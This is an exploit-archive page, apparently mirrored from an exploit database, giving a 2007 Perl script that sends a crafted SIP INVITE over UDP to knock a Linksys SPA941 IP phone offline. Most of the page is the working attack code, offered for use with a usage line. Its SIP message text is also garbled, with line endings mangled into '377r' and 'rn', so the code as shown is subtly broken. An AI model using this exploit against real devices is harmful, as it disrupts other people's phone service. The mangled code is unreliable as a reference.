Linksys SPA941 377 character Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linksys SPA941 377 character Remote Denial of Service Exploit
# Published : 2007-04-24
# Author : MADYNES
# Previous Title : NetSprint Toolbar ActiveX toolbar.dll Denial of Service POC
# Next Title : Linksys SPA941 (remote reboot) Remote Denial of Service Exploit

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

                       

$msg =

"INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0377r

Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00377r

Max-Forwards: 70377r

To: lynksys <sip:$ARGV[2]@$ARGV[0]>377r

From: <sip:tucuman@192.168.1.2>;tag=00377r

Call-ID: tucu@192.168.1.2377r

CSeq: 24865 INVITE377r

Contact: <sip:tucu@192.168.1.2>377r

Supported: 100rel377r

Content-Length: 0377r

rn";

 

$socket->send($msg);

# www.Syue.com [2007-04-24]